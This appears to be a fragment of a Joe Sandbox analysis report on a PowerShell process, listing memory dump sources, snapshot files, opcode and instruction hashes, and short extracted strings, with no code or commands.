                                      • Opcode Fuzzy Hash: 08e8076d896aa1766b3733e67e6816c36841f6fe2d1ef903cd1d7419ef1fe326
                                      • Instruction Fuzzy Hash: 1E81B570A093858FDB06CF2CC8A45D9BBB2FF46320F1541DAD490DB2A2D7399C56CBA5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 4b45b908bbd81f5656a0e56d89923959ece9c40689c6c61cf4009a2b7bceba7c
                                      • Instruction ID: 61cbd2bb3f31f9312d9de8b1f669c3dafa0e649304f6f31c30dabf5d33cc5a49
                                      • Opcode Fuzzy Hash: 4b45b908bbd81f5656a0e56d89923959ece9c40689c6c61cf4009a2b7bceba7c
                                      • Instruction Fuzzy Hash: C8719B30A002598FEB15DBA9D951AAEBBF2BF85301F104069E802AF395DB74ED49CF50
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b452b009829711ba541620d3cabbaf1df227b682ca6a7241d1f1facde52ed8de
                                      • Instruction ID: ad8f610fecc467861e46490ccd1bad5f538b9bafde1b64f0c51fb298aaedae50
                                      • Opcode Fuzzy Hash: b452b009829711ba541620d3cabbaf1df227b682ca6a7241d1f1facde52ed8de
                                      • Instruction Fuzzy Hash: DD714BB4E20206DFEB14CB59C454E6EB7B2AF89314F14806AD8056F396CB32DD91CFA1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3126b987f899efb74fe33de14771b2e03d8b6cbd3ff0df4060dfa8ff45181966
                                      • Instruction ID: 8671668d25902201a896b5e172436a38f83e0cc7daf08b0d802454e5a30a2f93
                                      • Opcode Fuzzy Hash: 3126b987f899efb74fe33de14771b2e03d8b6cbd3ff0df4060dfa8ff45181966
                                      • Instruction Fuzzy Hash: A871CD70A01208CFDB24DF68C884A9EFBB6FF85314F148969D415DB650EB34AC06CB80
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 485013b2a57311889ad52cb2504167e147a457e2a8ee80adb1d64fd7089f54a9
                                      • Instruction ID: abdf6d4d670dd68e743a9f8284da444472e7ba13b9ad01b9c6cd757f03de7063
                                      • Opcode Fuzzy Hash: 485013b2a57311889ad52cb2504167e147a457e2a8ee80adb1d64fd7089f54a9
                                      • Instruction Fuzzy Hash: 7F715A70E012089FDF14DFA9D894BADFBB2BF88304F148469D412AB790DB35AD4ACB41
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a975fabcc846e83b32ebe917cd8f13d06404d7e365537bd9ac19cc5f83f4eadc
                                      • Instruction ID: ccfec4294839a0fc056016e23e4a3e7017ba8fc215a450c51f1706bca43891a7
                                      • Opcode Fuzzy Hash: a975fabcc846e83b32ebe917cd8f13d06404d7e365537bd9ac19cc5f83f4eadc
                                      • Instruction Fuzzy Hash: D67158B0E002089FDF14CFA9D88879EBBF1AF88314F24812DE414EB694DB759945CF95
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b64796b84cf2d6d9e9a8d0a9712c5ab1c52ce91265ce2b0cc9abc758667eb355
                                      • Instruction ID: 36d0317cd51ea46bea25cd636f8ed1d6271ea988b24517ca8bfd6125cdaaea0a
                                      • Opcode Fuzzy Hash: b64796b84cf2d6d9e9a8d0a9712c5ab1c52ce91265ce2b0cc9abc758667eb355
                                      • Instruction Fuzzy Hash: 30714970E002089FDF14CFA9C88879EBBF2AF88714F24812DE415EB654EB759941CF95
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3a36b463fc9786e16d108ddf4a735d94509030294ba91ba4683eed8858c06f59
                                      • Instruction ID: 06bf8c276fbff3fea7fdd457c4d19d3fae0fb841dfd86466d000ac896a426165
                                      • Opcode Fuzzy Hash: 3a36b463fc9786e16d108ddf4a735d94509030294ba91ba4683eed8858c06f59
                                      • Instruction Fuzzy Hash: C76183B4A24206DFDB14CF55C554EAEBBB2AF89314F18806AD8046F392C731E991CFA1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: f67f8f5a86b4869445db2a42a0f6e9ec4a3092cf0280ec34fb9a04b4cc216235
                                      • Instruction ID: 191af5b4925370cb2ee1b8b008ebc1d63c8b4a3d62c9dbfc6aee841aa2765a36
                                      • Opcode Fuzzy Hash: f67f8f5a86b4869445db2a42a0f6e9ec4a3092cf0280ec34fb9a04b4cc216235
                                      • Instruction Fuzzy Hash: 40516E30A053548FDB15CF6CC890AADBBB2FF5A314B25419AD4519B3A1D736DC52CF90
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 043a927fb69aaec76fa4e802dc780aaba020751054e055c199a83daa0f250b0d
                                      • Instruction ID: 05257f48b9bd7d2ab3861a10b05022ba12a939199c76edc272fc36e633bf97a6
                                      • Opcode Fuzzy Hash: 043a927fb69aaec76fa4e802dc780aaba020751054e055c199a83daa0f250b0d
                                      • Instruction Fuzzy Hash: F3419EF1B142029FDB2057B854147AEF7A29FD5214B14846BD582AF3D3DA72EC428BF2
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 8ded42ff7453cac089916fb296619fcbf35ba3c8ed01873d65631c3f2cca981d
                                      • Instruction ID: bb252af63f55b36e9bffceab426958650830fb406f8d132d7472fc4f0b52186a
                                      • Opcode Fuzzy Hash: 8ded42ff7453cac089916fb296619fcbf35ba3c8ed01873d65631c3f2cca981d
                                      • Instruction Fuzzy Hash: C2419F71B522048FDB15DB74C858AAEBBB2EF89354F044869E402EB7A0DF35AD45CB90
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 198ae61f849dc6f8def54aad6d949e134a90a9c1de02c16c5ea64c2207d05469
                                      • Instruction ID: 772ec263c9647b6fc474a9875429f9f54decd67466f980ae7277b37d606e9c9f
                                      • Opcode Fuzzy Hash: 198ae61f849dc6f8def54aad6d949e134a90a9c1de02c16c5ea64c2207d05469
                                      • Instruction Fuzzy Hash: 24415D70E012088FDB14DFA9C8587EEFBB2BF89354F148969D005AB790DB74AD45CB91
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: efbd08ba6e9e1aa6141ff40386ca2ff0d9271cbacc7361ded06fcfa3311b4a01
                                      • Instruction ID: 19345bce4d3676024d530e32051163eb2d8f206b033cc0c550b8930f0f889921
                                      • Opcode Fuzzy Hash: efbd08ba6e9e1aa6141ff40386ca2ff0d9271cbacc7361ded06fcfa3311b4a01
                                      • Instruction Fuzzy Hash: DF41F874A002558FDB15CF5CC884AAEB7F2FF49320B248658E915A73A4D736EC52CF90
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: a737a6bba2fda4489edf5ae34cd7c220c8c5c1d51b70e71135de49d8292dc5c5
                                      • Instruction ID: e383b923baf6f1b4cb2af1dbfb549240e6b470f22c190e23e25b17223efe8677
                                      • Opcode Fuzzy Hash: a737a6bba2fda4489edf5ae34cd7c220c8c5c1d51b70e71135de49d8292dc5c5
                                      • Instruction Fuzzy Hash: 9D51DA34A00249AFDF15CFA8D584A9DFBB2FF88314F288159E405AB365C735AD82CF90
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 615a83f4085942bf399ee1ee694de3e7a74867a22269519a160aeda995d731c4
                                      • Instruction ID: c7b6a28c828f669ce7fa1c5e1203fd7458a6df488b526b63b8b2c3486b58980f
                                      • Opcode Fuzzy Hash: 615a83f4085942bf399ee1ee694de3e7a74867a22269519a160aeda995d731c4
                                      • Instruction Fuzzy Hash: E7410874A002099FDB54CF9CC9949AEBBF2FF48321B248658E915A73A0D336EC51CF54
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 3bc7c884d61d909368bdf73ab4bf0b742441ff43a534b4e202dd1d7c819e8652
                                      • Instruction ID: 73867d9ce6de5a40ecb4df1e2b44f7d6ed11434ae98fb9f2e71ba7ed9f752a7d
                                      • Opcode Fuzzy Hash: 3bc7c884d61d909368bdf73ab4bf0b742441ff43a534b4e202dd1d7c819e8652
                                      • Instruction Fuzzy Hash: 57418970A00609DFDB15CF58C498AAAF7B1FF48314B218159D845AB760C736FC81CFA5
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 021947877111f301512870eefc71376ca110213152a2e863a257279dd91d7ccb
                                      • Instruction ID: a291d6778aca64524b863af9cafd4e8d7a965cc8e2e5d791a4096f2084227a84
                                      • Opcode Fuzzy Hash: 021947877111f301512870eefc71376ca110213152a2e863a257279dd91d7ccb
                                      • Instruction Fuzzy Hash: 9E419E31E00219CBDB14DBE8C8506EEBBF2BF85341F104429E801AF394EB75A949CF50
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 0899cd6fff62cb8ce9187be157a4cc2547cbb2b7d45809cd5b0614673f818fed
                                      • Instruction ID: aabc9998fd72e9f3be569e1e74b79fc24e92d5b94ccda3e1899d707f38ab751f
                                      • Opcode Fuzzy Hash: 0899cd6fff62cb8ce9187be157a4cc2547cbb2b7d45809cd5b0614673f818fed
                                      • Instruction Fuzzy Hash: 1D317BB67242039BEB2406765850B7EF7928BC5210F14847BD502DB2D7EB72D9218FF2
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: ff4ebba180bea4b2f8a9fee425fe4215b914bb5740c268c72cb654e7a3ab7a89
                                      • Instruction ID: b6b5057fbde4ccb29cfee0c08afe61041a9a5d11954062c201560176777b49c7
                                      • Opcode Fuzzy Hash: ff4ebba180bea4b2f8a9fee425fe4215b914bb5740c268c72cb654e7a3ab7a89
                                      • Instruction Fuzzy Hash: A431AEB5B50210ABE7149B64C854FAF76B3AFC5704F248025E9056F3E2CF72AD428F91
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 5d76e5648adc5d1205abd2efcb03b544c0bd92bbc68be1af5e3768d5f7f3db5c
                                      • Instruction ID: f655333a5dc1dc4989af01cea248a5e379e89e9e935f6f589ccfec05d9e1a347
                                      • Opcode Fuzzy Hash: 5d76e5648adc5d1205abd2efcb03b544c0bd92bbc68be1af5e3768d5f7f3db5c
                                      • Instruction Fuzzy Hash: DF2161B232035BABF73459664900B3BB6D69BC9711F14843AE545EB3C3CE71D94083B1
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: bc5165cbcb53c67216a62e1eac507bc86936cf467ff2802e887a8165bea52dd5
                                      • Instruction ID: 499a576fa652f060260f5954d3540a25b15303992f698d875667f0449ab9c729
                                      • Opcode Fuzzy Hash: bc5165cbcb53c67216a62e1eac507bc86936cf467ff2802e887a8165bea52dd5
                                      • Instruction Fuzzy Hash: 0A312C30A011188FDF25DB74C8556EEB7B2AF99348F1044EAD509AB351CB35DE85CF81
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2002807101.0000000002C90000.00000040.00000800.00020000.00000000.sdmp, Offset: 02C90000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_2c90000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 6658b5209a5a8132bf1ea32e8a67b0e59e9de01a55d15254224fb725ef6ff8ba
                                      • Instruction ID: 64e3a7f199a4950d6d857fedb289d5a2e926676510444880d70d8e892a439771
                                      • Opcode Fuzzy Hash: 6658b5209a5a8132bf1ea32e8a67b0e59e9de01a55d15254224fb725ef6ff8ba
                                      • Instruction Fuzzy Hash: 5C313A75A002099FCB14CF99C584AAEF7B2FF48320B258299E419AB751C731ED81CFA0
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2009560927.0000000008000000.00000040.00000800.00020000.00000000.sdmp, Offset: 08000000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_8000000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 813defaf7282a70732a6c39e7c21d4f14055cd45ed1098803384fa3fdb45264d
                                      • Instruction ID: c791341ee86d0769c6a1927b0d3cb128443527b3a2aae5cde54236ee41a184cc
                                      • Opcode Fuzzy Hash: 813defaf7282a70732a6c39e7c21d4f14055cd45ed1098803384fa3fdb45264d
                                      • Instruction Fuzzy Hash: 1E312975A00605CFCB14CF48C4849AEFBB2FF88310B248699D519AB791C732EC91CF94
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: 2cfe6f600c8cd2ed7888b14e81a69f328d7bb7284f54fdab87fd13dcdc26e680
                                      • Instruction ID: 774d9b60b27ece8451f69eac0be77d9ba6d9b27cca380a840903ad271c47ff3b
                                      • Opcode Fuzzy Hash: 2cfe6f600c8cd2ed7888b14e81a69f328d7bb7284f54fdab87fd13dcdc26e680
                                      • Instruction Fuzzy Hash: 01213EB23283DAABF7350A7649007367FD65F86710F18846AA548EF2D3C675D944C3B1
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 84m$84m$tPq$tPq$$q
                                      • API String ID: 0-3407104185
                                      • Opcode ID: 4945d41496f59c68a655b88aa388dd2150a12e51e5ed6ab686a4c34cdc7053d6
                                      • Instruction ID: c89633d5d6fc35d3bb68f99e48c723c35a2b6289ec25636d69a4f5f9ff509bc9
                                      • Opcode Fuzzy Hash: 4945d41496f59c68a655b88aa388dd2150a12e51e5ed6ab686a4c34cdc7053d6
                                      • Instruction Fuzzy Hash: D361C771F24206DFD724AB68850476AB7E2EF89210F59C46AE8459F2D2CB31DD81CBF1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 84m$84m$tPq$tPq$$q
                                      • API String ID: 0-3407104185
                                      • Opcode ID: 67291747ef33a960d6332d46992e07bed8692b3f09e0fef56f08131a441631f9
                                      • Instruction ID: 16bf23d1d1ebcecb94cf066f55a92d9ec24958f83c4511931f340a86c72af63d
                                      • Opcode Fuzzy Hash: 67291747ef33a960d6332d46992e07bed8692b3f09e0fef56f08131a441631f9
                                      • Instruction Fuzzy Hash: 7A612A71B602069FD7348F688604B6AF7F2AF89210F14C06AE9069F2D2CB71DD41CBB1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$$q$$q$$q
                                      • API String ID: 0-170447905
                                      • Opcode ID: 86adaba0187033d45b027dfb369767dd9180db79c4c45de51bc6a6d485485a72
                                      • Instruction ID: 74bdc91e2a2cd65fb34b6bc60c5adda434378c686678230618513691b8700db6
                                      • Opcode Fuzzy Hash: 86adaba0187033d45b027dfb369767dd9180db79c4c45de51bc6a6d485485a72
                                      • Instruction Fuzzy Hash: 0A4106B1B243069FEB354E6498107AABFB2AF81210F14806BD445DB2D3DB75C941CBF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$$q$$q$$q
                                      • API String ID: 0-170447905
                                      • Opcode ID: 54ad7bbebee92a91d6bf19eb2a6b1a9ed116619c1c04c67710ffd0ef1f9c03cd
                                      • Instruction ID: a133afcd33d048e82a3e50447d542975b45d454643742d3523e518d1348b133d
                                      • Opcode Fuzzy Hash: 54ad7bbebee92a91d6bf19eb2a6b1a9ed116619c1c04c67710ffd0ef1f9c03cd
                                      • Instruction Fuzzy Hash: 583148B1F342178BDB246A75991027AFBE1AB95110B294CBBC542862C3EA35C482C7F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$tPq$$q$$q$$q
                                      • API String ID: 0-838716513
                                      • Opcode ID: ad370a957247039f78fd1d1565efa5c564a3884bbce896432cf52b23d532a9b6
                                      • Instruction ID: f54fe6c512422a571298ea73cad80a66f5f7d2a6611b9034c2f319f40b126b14
                                      • Opcode Fuzzy Hash: ad370a957247039f78fd1d1565efa5c564a3884bbce896432cf52b23d532a9b6
                                      • Instruction Fuzzy Hash: 22318FB1A30207EBEF248F55C541BAABBB2AB45320F58C066E8155B3D2C775E941CBF1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: (oq$(oq$(oq$(oq
                                      • API String ID: 0-3853041632
                                      • Opcode ID: 8faf9fd91d90283f0977853a8b3ec078858fff8c33d223655e051785ea8a1807
                                      • Instruction ID: 3e1d5498b59433558d8b122015d1501c0135387071995ce88694b11789e3079a
                                      • Opcode Fuzzy Hash: 8faf9fd91d90283f0977853a8b3ec078858fff8c33d223655e051785ea8a1807
                                      • Instruction Fuzzy Hash: ECF118B1B293469FDB259FA5C8047AABBA2EF85210F14846AE4058F2D3CB71D841C7F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$4'q$4'q
                                      • API String ID: 0-4210068417
                                      • Opcode ID: 228ae2545aedfa748641e31d1d6a025c7377c336e4a3d0fa1fc642c780c33f4e
                                      • Instruction ID: 492c48a15e5991664991d0e462dacae9c3bc6dd76a5e5c068fc24594eee1df94
                                      • Opcode Fuzzy Hash: 228ae2545aedfa748641e31d1d6a025c7377c336e4a3d0fa1fc642c780c33f4e
                                      • Instruction Fuzzy Hash: C6122FB5A103159FDB24DF24C950BEEB7B2EF89304F5080A9D4096B395CB76AE81CF91
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 84m$84m$tPq$tPq
                                      • API String ID: 0-2296983684
                                      • Opcode ID: 638605d6c2134f433c3f02dbf4b86588da72730e0c464f74959e3de279ac83d2
                                      • Instruction ID: 55badefdbdf1230055bd274f16c5e2c696d575ae1c5ba0a0604792a05b4993bc
                                      • Opcode Fuzzy Hash: 638605d6c2134f433c3f02dbf4b86588da72730e0c464f74959e3de279ac83d2
                                      • Instruction Fuzzy Hash: 41914A71720206DFD7288E69894876AB7E7BF89610F18846BD845DB2D2CA31DC41C7F1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q$$q$$q
                                      • API String ID: 0-4102054182
                                      • Opcode ID: df8f0ed5ec4d8651859ddc7d37f964bc1e5752bc4d5aa5377dbab8e4b459ac81
                                      • Instruction ID: 219965e0489f87f5e2a4e751c1a491bc6aafee3123e8e0a1e3f2662c30bc5c06
                                      • Opcode Fuzzy Hash: df8f0ed5ec4d8651859ddc7d37f964bc1e5752bc4d5aa5377dbab8e4b459ac81
                                      • Instruction Fuzzy Hash: 7B2129B27303079BEB34596A8D48B3BB6FA9BC4615F64C02AA405CB3D3DD75D84183B1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: $q$$q$$q$$q
                                      • API String ID: 0-4102054182
                                      • Opcode ID: b0c74a33ce9bb0e8495510ffefc00f8329d76ec977232ba84f01a4803273e9ca
                                      • Instruction ID: 32c9f525f990074d70fec358350cff63f6a082ec8cac77cb9d3407ed926bb0b0
                                      • Opcode Fuzzy Hash: b0c74a33ce9bb0e8495510ffefc00f8329d76ec977232ba84f01a4803273e9ca
                                      • Instruction Fuzzy Hash: A921E2B59243078FDF218E688A042B6BBB5AF45650F18807EC4059B393D774E544CBF1
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000A.00000002.2007655344.0000000007200000.00000040.00000800.00020000.00000000.sdmp, Offset: 07200000, based on PE: false
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_10_2_7200000_powershell.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID: 4'q$4'q$$q$$q
                                      • API String ID: 0-3199993180
                                      • Opcode ID: d93dd22faeda2aa975e987aadeeffc91073c0446366172fa9779245b4b5f05db
                                      • Instruction ID: 323fdff88a2d0f548689508702d8ffe259028c07b22c40c7b3d8a37c371a8e9e
                                      • Opcode Fuzzy Hash: d93dd22faeda2aa975e987aadeeffc91073c0446366172fa9779245b4b5f05db
                                      • Instruction Fuzzy Hash: B001715162D3D64BE72717690920219AFB21F83540B1980D7C085DF2E3CAA58D0987A3